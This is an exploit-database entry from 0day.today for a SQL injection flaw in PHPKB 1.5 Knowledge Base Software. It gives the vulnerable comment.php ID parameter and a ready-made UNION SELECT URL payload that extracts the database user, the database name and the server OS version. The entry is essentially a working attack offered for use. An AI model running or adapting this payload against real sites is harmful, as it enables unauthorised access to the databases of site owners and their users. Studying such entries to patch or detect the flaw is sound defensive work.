[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPKB 1.5 Knowledge Base (ID) SQL Injection Vulnerability

Author
parad0x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2866
Category
web applications
Date add
10-04-2008
Platform
unsorted
=========================================================
PHPKB 1.5 Knowledge Base (ID) SQL Injection Vulnerability
=========================================================



PHPKB Knowledge Base Software (comment.php) Sql Injection Vulnerability
-------------------------------------------------------------------------------------------------
# Author  : parad0x
# Script  : PHPKB Knowledge Base Software 
# Script Homepage : http://www.knowledgebase-script.com
 -------------------------------------------------------------------------------------------------
http://[target]/comment.php?ID=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*
-------------------------------------------------------------------------------------------------




#  0day.today [2024-12-26]  #